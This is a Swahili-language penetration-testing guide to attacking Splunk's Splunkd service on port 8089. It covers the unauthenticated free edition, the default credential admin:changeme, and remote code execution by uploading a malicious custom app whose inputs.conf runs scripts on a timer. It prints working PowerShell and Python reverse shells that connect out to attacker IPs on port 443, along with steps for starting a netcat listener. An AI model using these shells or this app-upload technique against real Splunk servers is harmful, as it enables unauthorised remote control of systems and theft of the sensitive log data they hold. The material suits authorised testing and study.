8089 - Pentesting Splunkd

Reading time: 4 minutes

Msingi wa Taarifa

• Zana ya uchambuzi wa log inayotumika kwa ukusanyaji wa data, uchambuzi, na uonyeshaji
• Inatumika sana katika ufuatiliaji wa usalama na uchambuzi wa biashara
• Bandari za kawaida:
• Seva ya wavuti: 8000
• Huduma ya Splunkd: 8089

Njia za Uthibitishaji wa Uthibitisho:

1. Ukatili wa Toleo la Bure

• Toleo la majaribio linabadilishwa kiotomatiki kuwa toleo la bure baada ya siku 60
• Toleo la bure halina uthibitisho
• Hatari ya usalama ikiwa halitashughulikiwa
• Wasimamizi wanaweza kupuuza athari za usalama

2. Udhaifu wa Akreditivu

• Toleo za zamani: Akreditivu za kawaida admin:changeme
• Toleo za kisasa: Akreditivu huwekwa wakati wa usakinishaji
• Uwezekano wa matumizi ya nywila dhaifu (mfano, admin, Welcome, Password123)

3. Fursa za Utekelezaji wa Msimbo wa Kijijini

• Njia nyingi za utekelezaji wa msimbo:
• Programu za Django upande wa seva
• Ncha za REST
• Ingizo la skripti
• Skripti za arifa
• Msaada wa majukwaa tofauti (Windows/Linux)
• Ingizo la skripti linaweza kukimbia:
• Skripti za Bash
• Skripti za PowerShell
• Skripti za Batch

Uwezekano wa Ukatili Muhimu:

• Hifadhi ya data nyeti
• Ukosefu wa uthibitisho katika toleo la bure
• Njia nyingi za uwezekano wa utekelezaji wa msimbo wa kijijini
• Uwezekano wa kutumia ingizo la skripti kwa kuathiri mfumo

Shodan

• Splunk build

RCE

Unda Programu Maalum

Splunk inatoa njia ya kisasa ya utekelezaji wa msimbo wa kijijini kupitia usambazaji wa programu maalum, ikitumia uwezo wake wa skripti za majukwaa tofauti. Mbinu ya msingi ya ukatili inahusisha kuunda programu mbaya inayoweza kutekeleza shell za kinyume kwenye mifumo ya Windows na Linux.

Programu maalum inaweza kukimbia Python, Batch, Bash, au PowerShell scripts. Zaidi ya hayo, Splunk inakuja na Python iliyosakinishwa, hivyo hata katika mifumo ya Windows utaweza kukimbia msimbo wa python.

Unaweza kutumia hii mfano na bin inayojumuisha mfano wa Python na PowerShell. Au unaweza kuunda yako mwenyewe.

Mchakato wa ukatili unafuata mbinu thabiti katika majukwaa:

splunk_shell/
├── bin        (reverse shell scripts)
└── default    (inputs.conf configuration)

Faili muhimu la usanidi inputs.conf linawezesha skripti kwa:

• Kuweka disabled = 0
• Kuunda kipindi cha utekelezaji cha sekunde 10
• Kuelezea aina ya chanzo cha skripti

Kuweka ni rahisi:

1. Tengeneza kifurushi cha programu mbaya
2. Weka msikilizaji (Netcat/socat) kwenye mashine ya kushambulia
3. Pakia programu kupitia kiolesura cha Splunk
4. Washa utekelezaji wa skripti kiotomatiki baada ya kupakia

Mfano wa Windows PowerShell reverse shell:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()

Sample Linux Python reverse shell:

import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

RCE & Privilege Escalation

Katika ukurasa ufuatao unaweza kupata maelezo jinsi huduma hii inaweza kutumika vibaya ili kupandisha hadhi na kupata kudumu:

Splunk LPE and Persistence

References

• https://academy.hackthebox.com/module/113/section/1213